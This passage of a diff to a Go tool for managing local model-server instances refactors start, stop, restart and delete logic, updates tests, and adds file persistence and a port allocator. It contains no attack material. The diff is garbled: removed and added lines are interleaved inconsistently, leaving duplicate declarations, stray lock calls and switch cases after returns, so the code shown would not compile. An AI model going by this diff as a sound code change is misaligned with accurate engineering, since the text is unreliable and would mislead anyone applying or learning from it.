 			return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
 		}
 	}
 	// Now update the options while the instance is stopped
-	instance.SetOptions(options)
+	inst.SetOptions(options)
 	// If it was running before, start it again with the new options
 	if wasRunning {
-		if err := instance.Start(); err != nil {
+		if err := inst.Start(); err != nil {
 			return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
 		}
 	}
-	im.mu.Lock()
+	if err := im.persistInstance(inst); err != nil {
 	defer im.mu.Unlock()
 	if err := im.persistInstance(instance); err != nil {
 		return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
 	}
-	return instance, nil
+	return inst, nil
 }
 // DeleteInstance removes stopped instance by its name.
 func (im *instanceManager) DeleteInstance(name string) error {
-	im.mu.Lock()
+	inst, exists := im.registry.get(name)
 	defer im.mu.Unlock()
 	instance, exists := im.instances[name]
 	if !exists {
 		return fmt.Errorf("instance with name %s not found", name)
 	}
-	if instance.IsRunning() {
+	// Check if instance is remote and delegate to remote operation
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		err := im.remote.deleteInstance(ctx, node, name)
 		if err != nil {
 			return err
 		}
 		// Clean up local tracking
 		im.remote.removeInstance(name)
 		im.registry.remove(name)
 		// Delete the instance's persistence file
 		if err := im.persistence.delete(name); err != nil {
 			return fmt.Errorf("failed to delete config file for remote instance %s: %w", name, err)
 		}
 		return nil
 	}
 	// Lock this specific instance and clean up the lock on completion
 	lock := im.lockInstance(name)
 	lock.Lock()
 	defer im.unlockAndCleanup(name)
 	if inst.IsRunning() {
 		return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
 	}
-	delete(im.ports, instance.GetPort())
+	// Release port (use ReleaseByInstance for proper cleanup)
-	delete(im.instances, name)
+	im.ports.releaseByInstance(name)
-	// Delete the instance's config file if persistence is enabled
+	// Remove from registry
-	instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
+	if err := im.registry.remove(name); err != nil {
-	if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
+		return fmt.Errorf("failed to remove instance from registry: %w", err)
-		return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
+	}
 	// Delete persistence file
 	if err := im.persistence.delete(name); err != nil {
 		return fmt.Errorf("failed to delete config file for instance %s: %w", name, err)
 	}
 	return nil
@@ -161,156 +352,186 @@ func (im *instanceManager) DeleteInstance(name string) error {
 // StartInstance starts a stopped instance and returns it.
 // If the instance is already running, it returns an error.
-func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
+func (im *instanceManager) StartInstance(name string) (*instance.Instance, error) {
-	im.mu.RLock()
+	inst, exists := im.registry.get(name)
 	instance, exists := im.instances[name]
 	maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
 	im.mu.RUnlock()
 	if !exists {
 		return nil, fmt.Errorf("instance with name %s not found", name)
 	}
-	if instance.IsRunning() {
+
-		return instance, fmt.Errorf("instance with name %s is already running", name)
+	// Check if instance is remote and delegate to remote operation
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		remoteInst, err := im.remote.startInstance(ctx, node, name)
 		if err != nil {
 			return nil, err
 		}
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		return inst, nil
 	}
-	if maxRunningExceeded {
+	// Lock this specific instance only
-		return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
+	lock := im.lockInstance(name)
 	lock.Lock()
 	defer lock.Unlock()
 	// Idempotent: if already running, just return success
 	if inst.IsRunning() {
 		return inst, nil
 	}
-	if err := instance.Start(); err != nil {
+	// Check max running instances limit for local instances only
 	if im.IsMaxRunningInstancesReached() {
 		return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.globalConfig.Instances.MaxRunningInstances))
 	}
 	if err := inst.Start(); err != nil {
 		return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
 	}
-	im.mu.Lock()
+	// Persist instance (best-effort, don't fail if persistence fails)
-	defer im.mu.Unlock()
+	if err := im.persistInstance(inst); err != nil {
-	err := im.persistInstance(instance)
+		log.Printf("Warning: failed to persist instance %s: %v", name, err)
 	if err != nil {
 		return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
 	}
-	return instance, nil
+	return inst, nil
 }
 func (im *instanceManager) IsMaxRunningInstancesReached() bool {
-	im.mu.RLock()
+	if im.globalConfig.Instances.MaxRunningInstances == -1 {
-	defer im.mu.RUnlock()
+		return false
 	if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
 		return true
 	}
-	return false
+	// Count only local running instances (each node has its own limits)
 	localRunningCount := 0
 	for _, inst := range im.registry.listRunning() {
 		if !inst.IsRemote() {
 			localRunningCount++
 		}
 	}
 	return localRunningCount >= im.globalConfig.Instances.MaxRunningInstances
 }
 // StopInstance stops a running instance and returns it.
-func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
+func (im *instanceManager) StopInstance(name string) (*instance.Instance, error) {
-	im.mu.RLock()
+	inst, exists := im.registry.get(name)
 	instance, exists := im.instances[name]
 	im.mu.RUnlock()
 	if !exists {
 		return nil, fmt.Errorf("instance with name %s not found", name)
 	}
-	if !instance.IsRunning() {
+
-		return instance, fmt.Errorf("instance with name %s is already stopped", name)
+	// Check if instance is remote and delegate to remote operation
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		remoteInst, err := im.remote.stopInstance(ctx, node, name)
 		if err != nil {
 			return nil, err
 		}
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		return inst, nil
 	}
-	if err := instance.Stop(); err != nil {
+	// Lock this specific instance only
 	lock := im.lockInstance(name)
 	lock.Lock()
 	defer lock.Unlock()
 	// Idempotent: if already stopped, just return success
 	if !inst.IsRunning() {
 		return inst, nil
 	}
 	if err := inst.Stop(); err != nil {
 		return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
 	}
-	im.mu.Lock()
+	// Persist instance (best-effort, don't fail if persistence fails)
-	defer im.mu.Unlock()
+	if err := im.persistInstance(inst); err != nil {
-	err := im.persistInstance(instance)
+		log.Printf("Warning: failed to persist instance %s: %v", name, err)
 	if err != nil {
 		return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
 	}
-	return instance, nil
+	return inst, nil
 }
 // RestartInstance stops and then starts an instance, returning the updated instance.
-func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
+func (im *instanceManager) RestartInstance(name string) (*instance.Instance, error) {
-	instance, err := im.StopInstance(name)
+	inst, exists := im.registry.get(name)
-	if err != nil {
+	if !exists {
-		return nil, err
+		return nil, fmt.Errorf("instance with name %s not found", name)
 	}
-	return im.StartInstance(instance.Name)
+
 	// Check if instance is remote and delegate to remote operation
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		remoteInst, err := im.remote.restartInstance(ctx, node, name)
 		if err != nil {
 			return nil, err
 		}
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		return inst, nil
 	}
 	// Lock this specific instance for the entire restart operation to ensure atomicity
 	lock := im.lockInstance(name)
 	lock.Lock()
 	defer lock.Unlock()
 	// Stop the instance
 	if inst.IsRunning() {
 		if err := inst.Stop(); err != nil {
 			return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
 		}
 	}
 	// Start the instance
 	if err := inst.Start(); err != nil {
 		return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
 	}
 	// Persist the restarted instance
 	if err := im.persistInstance(inst); err != nil {
 		log.Printf("Warning: failed to persist instance %s: %v", name, err)
 	}
 	return inst, nil
 }
 // GetInstanceLogs retrieves the logs for a specific instance by its name.
-func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
+func (im *instanceManager) GetInstanceLogs(name string, numLines int) (string, error) {
-	im.mu.RLock()
+	inst, exists := im.registry.get(name)
 	_, exists := im.instances[name]
 	im.mu.RUnlock()
 	if !exists {
 		return "", fmt.Errorf("instance with name %s not found", name)
 	}
-	// TODO: Implement actual log retrieval logic
+	// Check if instance is remote and delegate to remote operation
-	return fmt.Sprintf("Logs for instance %s", name), nil
+	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		return im.remote.getInstanceLogs(ctx, node, name, numLines)
 	}
 	// Get logs from the local instance
 	return inst.GetLogs(numLines)
 }
 // getPortFromOptions extracts the port from backend-specific options
-func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
+func (im *instanceManager) getPortFromOptions(options *instance.Options) int {
-	switch options.BackendType {
+	return options.BackendOptions.GetPort()
 	case backends.BackendTypeLlamaCpp:
 		if options.LlamaServerOptions != nil {
 			return options.LlamaServerOptions.Port
 		}
 	case backends.BackendTypeMlxLm:
 		if options.MlxServerOptions != nil {
 			return options.MlxServerOptions.Port
 		}
 	case backends.BackendTypeVllm:
 		if options.VllmServerOptions != nil {
 			return options.VllmServerOptions.Port
 		}
 	}
 	return 0
 }
 // setPortInOptions sets the port in backend-specific options
-func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
+func (im *instanceManager) setPortInOptions(options *instance.Options, port int) {
-	switch options.BackendType {
+	options.BackendOptions.SetPort(port)
 	case backends.BackendTypeLlamaCpp:
 		if options.LlamaServerOptions != nil {
 			options.LlamaServerOptions.Port = port
 		}
 	case backends.BackendTypeMlxLm:
 		if options.MlxServerOptions != nil {
 			options.MlxServerOptions.Port = port
 		}
 	case backends.BackendTypeVllm:
 		if options.VllmServerOptions != nil {
 			options.VllmServerOptions.Port = port
 		}
 	}
 }
-// assignAndValidatePort assigns a port if not specified and validates it's not in use
+// EvictLRUInstance finds and stops the least recently used running instance.
-func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
+func (im *instanceManager) EvictLRUInstance() error {
-	currentPort := im.getPortFromOptions(options)
+	return im.lifecycle.evictLRU()
 	if currentPort == 0 {
 		// Assign a port if not specified
 		port, err := im.getNextAvailablePort()
 		if err != nil {
 			return fmt.Errorf("failed to get next available port: %w", err)
 		}
 		im.setPortInOptions(options, port)
 		// Mark the port as used
 		im.ports[port] = true
 	} else {
 		// Validate the specified port
 		if _, exists := im.ports[currentPort]; exists {
 			return fmt.Errorf("port %d is already in use", currentPort)
 		}
 		// Mark the port as used
 		im.ports[currentPort] = true
 	}
 	return nil
 }
--- a/pkg/manager/operations_test.go
+++ b/pkg/manager/operations_test.go
@@ -2,7 +2,6 @@ package manager_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
@@ -10,40 +9,14 @@ import (
 	"testing"
 )
-func TestCreateInstance_Success(t *testing.T) {
+func TestCreateInstance_FailsWithDuplicateName(t *testing.T) {
 	manager := createTestManager()
 	options := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
 	inst, err := manager.CreateInstance("test-instance", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	if inst.Name != "test-instance" {
 		t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
 	}
 	if inst.GetStatus() != instance.Stopped {
 		t.Error("New instance should not be running")
 	}
 	if inst.GetPort() != 8080 {
 		t.Errorf("Expected port 8080, got %d", inst.GetPort())
 	}
 }
 func TestCreateInstance_ValidationAndLimits(t *testing.T) {
 	// Test duplicate names
 	mngr := createTestManager()
-	options := &instance.CreateInstanceOptions{
+	options := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
+		BackendOptions: backends.Options{
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			BackendType: backends.BackendTypeLlamaCpp,
-			Model: "/path/to/model.gguf",
+			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
@@ -60,20 +33,35 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
 	if !strings.Contains(err.Error(), "already exists") {
 		t.Errorf("Expected duplicate name error, got: %v", err)
 	}
 }
-	// Test max instances limit
+func TestCreateInstance_FailsWhenMaxInstancesReached(t *testing.T) {
-	backendConfig := config.BackendConfig{
+	appConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
 				Command: "llama-server",
 			},
 		},
 		Instances: config.InstancesConfig{
 			PortRange:            [2]int{8000, 9000},
 			MaxInstances:         1, // Very low limit for testing
 			TimeoutCheckInterval: 5,
 		},
 		LocalNode: "main",
 		Nodes:     map[string]config.NodeConfig{},
 	}
-	cfg := config.InstancesConfig{
+	limitedManager := manager.New(appConfig)
 		PortRange:            [2]int{8000, 9000},
 		MaxInstances:         1, // Very low limit for testing
 		TimeoutCheckInterval: 5,
 	}
 	limitedManager := manager.NewInstanceManager(backendConfig, cfg)
-	_, err = limitedManager.CreateInstance("instance1", options)
+	options := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
 	_, err := limitedManager.CreateInstance("instance1", options)
 	if err != nil {
 		t.Fatalf("CreateInstance 1 failed: %v", err)
 	}
@@ -88,33 +76,32 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
 	}
 }
-func TestPortManagement(t *testing.T) {
+func TestCreateInstance_FailsWithPortConflict(t *testing.T) {
 	manager := createTestManager()
-	// Test auto port assignment
+	options1 := &instance.Options{
-	options1 := &instance.CreateInstanceOptions{
+		BackendOptions: backends.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
+			BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			LlamaServerOptions: &backends.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
+				Model: "/path/to/model.gguf",
 				Port:  8080,
 			},
 		},
 	}
-	inst1, err := manager.CreateInstance("instance1", options1)
+	_, err := manager.CreateInstance("instance1", options1)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
-	port1 := inst1.GetPort()
+	// Try to create instance with same port
-	if port1 < 8000 || port1 > 9000 {
+	options2 := &instance.Options{
-		t.Errorf("Expected port in range 8000-9000, got %d", port1)
+		BackendOptions: backends.Options{
-	}
+			BackendType: backends.BackendTypeLlamaCpp,
-
+			LlamaServerOptions: &backends.LlamaServerOptions{
-	// Test port conflict detection
+				Model: "/path/to/model2.gguf",
-	options2 := &instance.CreateInstanceOptions{
+				Port:  8080, // Same port - should conflict
-		BackendType: backends.BackendTypeLlamaCpp,
+			},
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model2.gguf",
 			Port:  port1, // Same port - should conflict
 		},
 	}
@@ -125,98 +112,21 @@ func TestPortManagement(t *testing.T) {
 	if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
 		t.Errorf("Expected port conflict error, got: %v", err)
 	}
 	// Test port release on deletion
 	specificPort := 8080
 	options3 := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  specificPort,
 		},
 	}
 	_, err = manager.CreateInstance("port-test", options3)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	err = manager.DeleteInstance("port-test")
 	if err != nil {
 		t.Fatalf("DeleteInstance failed: %v", err)
 	}
 	// Should be able to create new instance with same port
 	_, err = manager.CreateInstance("new-port-test", options3)
 	if err != nil {
 		t.Errorf("Expected to reuse port after deletion, got error: %v", err)
 	}
 }
-func TestInstanceOperations(t *testing.T) {
+func TestInstanceOperations_FailWithNonExistentInstance(t *testing.T) {
 	manager := createTestManager()
-	options := &instance.CreateInstanceOptions{
+	options := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
+		BackendOptions: backends.Options{
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			BackendType: backends.BackendTypeLlamaCpp,
-			Model: "/path/to/model.gguf",
+			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
-	// Create instance
+	_, err := manager.GetInstance("nonexistent")
 	created, err := manager.CreateInstance("test-instance", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	// Get instance
 	retrieved, err := manager.GetInstance("test-instance")
 	if err != nil {
 		t.Fatalf("GetInstance failed: %v", err)
 	}
 	if retrieved.Name != created.Name {
 		t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
 	}
 	// Update instance
 	newOptions := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/new-model.gguf",
 			Port:  8081,
 		},
 	}
 	updated, err := manager.UpdateInstance("test-instance", newOptions)
 	if err != nil {
 		t.Fatalf("UpdateInstance failed: %v", err)
 	}
 	if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
 		t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
 	}
 	// List instances
 	instances, err := manager.ListInstances()
 	if err != nil {
 		t.Fatalf("ListInstances failed: %v", err)
 	}
 	if len(instances) != 1 {
 		t.Errorf("Expected 1 instance, got %d", len(instances))
 	}
 	// Delete instance
 	err = manager.DeleteInstance("test-instance")
 	if err != nil {
 		t.Fatalf("DeleteInstance failed: %v", err)
 	}
 	_, err = manager.GetInstance("test-instance")
 	if err == nil {
 		t.Error("Instance should not exist after deletion")
 	}
 	// Test operations on non-existent instances
 	_, err = manager.GetInstance("nonexistent")
 	if err == nil || !strings.Contains(err.Error(), "not found") {
 		t.Errorf("Expected 'not found' error, got: %v", err)
 	}
@@ -231,3 +141,143 @@ func TestInstanceOperations(t *testing.T) {
 		t.Errorf("Expected 'not found' error, got: %v", err)
 	}
 }
 func TestDeleteInstance_RunningInstanceFails(t *testing.T) {
 	mgr := createTestManager()
 	defer mgr.Shutdown()
 	options := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
 	_, err := mgr.CreateInstance("test-instance", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	_, err = mgr.StartInstance("test-instance")
 	if err != nil {
 		t.Fatalf("StartInstance failed: %v", err)
 	}
 	// Should fail to delete running instance
 	err = mgr.DeleteInstance("test-instance")
 	if err == nil {
 		t.Error("Expected error when deleting running instance")
 	}
 }
 func TestUpdateInstance(t *testing.T) {
 	mgr := createTestManager()
 	defer mgr.Shutdown()
 	options := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 				Port:  8080,
 			},
 		},
 	}
 	_, err := mgr.CreateInstance("test-instance", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	_, err = mgr.StartInstance("test-instance")
 	if err != nil {
 		t.Fatalf("StartInstance failed: %v", err)
 	}
 	// Update running instance with new model
 	newOptions := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/new-model.gguf",
 				Port:  8080,
 			},
 		},
 	}
 	updated, err := mgr.UpdateInstance("test-instance", newOptions)
 	if err != nil {
 		t.Fatalf("UpdateInstance failed: %v", err)
 	}
 	// Should still be running after update
 	if !updated.IsRunning() {
 		t.Error("Instance should be running after update")
 	}
 	if updated.GetOptions().BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
 		t.Errorf("Expected model to be updated")
 	}
 }
 func TestUpdateInstance_ReleasesOldPort(t *testing.T) {
 	mgr := createTestManager()
 	defer mgr.Shutdown()
 	options := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 				Port:  8080,
 			},
 		},
 	}
 	inst, err := mgr.CreateInstance("test-instance", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	if inst.GetPort() != 8080 {
 		t.Errorf("Expected port 8080, got %d", inst.GetPort())
 	}
 	// Update with new port
 	newOptions := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 				Port:  8081,
 			},
 		},
 	}
 	updated, err := mgr.UpdateInstance("test-instance", newOptions)
 	if err != nil {
 		t.Fatalf("UpdateInstance failed: %v", err)
 	}
 	if updated.GetPort() != 8081 {
 		t.Errorf("Expected port 8081, got %d", updated.GetPort())
 	}
 	// Old port should be released - try to create new instance with old port
 	options2 := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model2.gguf",
 				Port:  8080,
 			},
 		},
 	}
 	_, err = mgr.CreateInstance("test-instance-2", options2)
 	if err != nil {
 		t.Errorf("Should be able to use old port 8080: %v", err)
 	}
 }
--- a/pkg/manager/persistence.go
+++ b/pkg/manager/persistence.go
@@ -0,0 +1,223 @@
 package manager
 import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/instance"
 	"log"
 	"os"
 	"path/filepath"
 	"strings"
 	"sync"
 )
 // instancePersister provides atomic file-based persistence with durability guarantees.
 type instancePersister struct {
 	mu           sync.Mutex
 	instancesDir string
 	enabled      bool
 }
 // newInstancePersister creates a new instance persister.
 // If instancesDir is empty, persistence is disabled.
 func newInstancePersister(instancesDir string) (*instancePersister, error) {
 	if instancesDir == "" {
 		return &instancePersister{
 			enabled: false,
 		}, nil
 	}
 	// Ensure the instances directory exists
 	if err := os.MkdirAll(instancesDir, 0755); err != nil {
 		return nil, fmt.Errorf("failed to create instances directory: %w", err)
 	}
 	return &instancePersister{
 		instancesDir: instancesDir,
 		enabled:      true,
 	}, nil
 }
 // Save persists an instance to disk with atomic write
 func (p *instancePersister) save(inst *instance.Instance) error {
 	if !p.enabled {
 		return nil
 	}
 	if inst == nil {
 		return fmt.Errorf("cannot save nil instance")
 	}
 	// Validate instance name to prevent path traversal
 	validatedName, err := p.validateInstanceName(inst.Name)
 	if err != nil {
 		return err
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	instancePath := filepath.Join(p.instancesDir, validatedName+".json")
 	tempPath := instancePath + ".tmp"
 	// Serialize instance to JSON
 	jsonData, err := json.MarshalIndent(inst, "", "  ")
 	if err != nil {
 		return fmt.Errorf("failed to marshal instance %s: %w", inst.Name, err)
 	}
 	// Create temporary file
 	tempFile, err := os.OpenFile(tempPath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644)
 	if err != nil {
 		return fmt.Errorf("failed to create temp file for instance %s: %w", inst.Name, err)
 	}
 	// Write data to temporary file
 	if _, err := tempFile.Write(jsonData); err != nil {
 		tempFile.Close()
 		os.Remove(tempPath)
 		return fmt.Errorf("failed to write temp file for instance %s: %w", inst.Name, err)
 	}
 	// Sync to disk before rename to ensure durability
 	if err := tempFile.Sync(); err != nil {
 		tempFile.Close()
 		os.Remove(tempPath)
 		return fmt.Errorf("failed to sync temp file for instance %s: %w", inst.Name, err)
 	}
 	// Close the file
 	if err := tempFile.Close(); err != nil {
 		os.Remove(tempPath)
 		return fmt.Errorf("failed to close temp file for instance %s: %w", inst.Name, err)
 	}
 	// Atomic rename (this is atomic on POSIX systems)
 	if err := os.Rename(tempPath, instancePath); err != nil {
 		os.Remove(tempPath)
 		return fmt.Errorf("failed to rename temp file for instance %s: %w", inst.Name, err)
 	}
 	return nil
 }
 // Delete removes an instance's persistence file from disk.
 func (p *instancePersister) delete(name string) error {
 	if !p.enabled {
 		return nil
 	}
 	validatedName, err := p.validateInstanceName(name)
 	if err != nil {
 		return err
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	instancePath := filepath.Join(p.instancesDir, validatedName+".json")
 	if err := os.Remove(instancePath); err != nil {
 		if os.IsNotExist(err) {
 			// Not an error if file doesn't exist
 			return nil
 		}
 		return fmt.Errorf("failed to delete instance file for %s: %w", name, err)
 	}
 	return nil
 }
 // LoadAll loads all persisted instances from disk.
 // Returns a slice of instances and any errors encountered during loading.
 func (p *instancePersister) loadAll() ([]*instance.Instance, error) {
 	if !p.enabled {
 		return nil, nil
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	// Check if instances directory exists
 	if _, err := os.Stat(p.instancesDir); os.IsNotExist(err) {
 		return nil, nil // No instances directory, return empty list
 	}
 	// Read all JSON files from instances directory
 	files, err := os.ReadDir(p.instancesDir)
 	if err != nil {
 		return nil, fmt.Errorf("failed to read instances directory: %w", err)
 	}
 	instances := make([]*instance.Instance, 0)
 	var loadErrors []string
 	for _, file := range files {
 		if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
 			continue
 		}
 		instanceName := strings.TrimSuffix(file.Name(), ".json")
 		instancePath := filepath.Join(p.instancesDir, file.Name())
 		inst, err := p.loadInstanceFile(instanceName, instancePath)
 		if err != nil {
 			log.Printf("Failed to load instance %s: %v", instanceName, err)
 			loadErrors = append(loadErrors, fmt.Sprintf("%s: %v", instanceName, err))
 			continue
 		}
 		instances = append(instances, inst)
 	}
 	if len(loadErrors) > 0 {
 		log.Printf("Loaded %d instances with %d errors", len(instances), len(loadErrors))
 	} else if len(instances) > 0 {
 		log.Printf("Loaded %d instances from persistence", len(instances))
 	}
 	return instances, nil
 }
 // loadInstanceFile is an internal helper that loads a single instance file.
 // Note: This assumes the mutex is already held by the caller.
 func (p *instancePersister) loadInstanceFile(name, path string) (*instance.Instance, error) {
 	data, err := os.ReadFile(path)
 	if err != nil {
 		return nil, fmt.Errorf("failed to read instance file: %w", err)
 	}
 	var inst instance.Instance
 	if err := json.Unmarshal(data, &inst); err != nil {
 		return nil, fmt.Errorf("failed to unmarshal instance: %w", err)
 	}
 	// Validate the instance name matches the filename
 	if inst.Name != name {
 		return nil, fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, inst.Name)
 	}
 	return &inst, nil
 }
 // validateInstanceName ensures the instance name is safe for filesystem operations.
 // Returns the validated name if valid, or an error if invalid.
 func (p *instancePersister) validateInstanceName(name string) (string, error) {
 	if name == "" {
 		return "", fmt.Errorf("instance name cannot be empty")
 	}
 	// Check for path separators and parent directory references
 	// This prevents path traversal attacks
 	if strings.Contains(name, "/") || strings.Contains(name, "\\") || strings.Contains(name, "..") {
 		return "", fmt.Errorf("invalid instance name: %s (cannot contain path separators or '..')", name)
 	}
 	// Additional check: ensure the name doesn't start with a dot (hidden files)
 	// or contain any other suspicious characters
 	if strings.HasPrefix(name, ".") {
 		return "", fmt.Errorf("invalid instance name: %s (cannot start with '.')", name)
 	}
 	return name, nil
 }
--- a/pkg/manager/ports.go
+++ b/pkg/manager/ports.go
@@ -0,0 +1,184 @@
 package manager
 import (
 	"fmt"
 	"math/bits"
 	"sync"
 )
 // portAllocator provides efficient port allocation using a bitmap for O(1) operations.
 // The bitmap approach prevents unbounded memory growth and simplifies port management.
 type portAllocator struct {
 	mu sync.Mutex
 	// Bitmap for O(1) allocation/release
 	// Each bit represents a port (1 = allocated, 0 = free)
 	bitmap []uint64 // Each uint64 covers 64 ports
 	// Map port to instance name for cleanup operations
 	allocated map[int]string
 	minPort   int
 	maxPort   int
 	rangeSize int
 }
 // newPortAllocator creates a new port allocator for the given port range.
 // Returns an error if the port range is invalid.
 func newPortAllocator(minPort, maxPort int) (*portAllocator, error) {
 	if minPort <= 0 || maxPort <= 0 {
 		return nil, fmt.Errorf("invalid port range: min=%d, max=%d (must be > 0)", minPort, maxPort)
 	}
 	if minPort > maxPort {
 		return nil, fmt.Errorf("invalid port range: min=%d > max=%d", minPort, maxPort)
 	}
 	rangeSize := maxPort - minPort + 1
 	bitmapSize := (rangeSize + 63) / 64 // Round up to nearest uint64
 	return &portAllocator{
 		bitmap:    make([]uint64, bitmapSize),
 		allocated: make(map[int]string),
 		minPort:   minPort,
 		maxPort:   maxPort,
 		rangeSize: rangeSize,
 	}, nil
 }
 // allocate finds and allocates the first available port for the given instance.
 // Returns the allocated port or an error if no ports are available.
 func (p *portAllocator) allocate(instanceName string) (int, error) {
 	if instanceName == "" {
 		return 0, fmt.Errorf("instance name cannot be empty")
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	port, err := p.findFirstFreeBit()
 	if err != nil {
 		return 0, err
 	}
 	p.setBit(port)
 	p.allocated[port] = instanceName
 	return port, nil
 }
 // allocateSpecific allocates a specific port for the given instance.
 // Returns an error if the port is already allocated or out of range.
 func (p *portAllocator) allocateSpecific(port int, instanceName string) error {
 	if instanceName == "" {
 		return fmt.Errorf("instance name cannot be empty")
 	}
 	if port < p.minPort || port > p.maxPort {
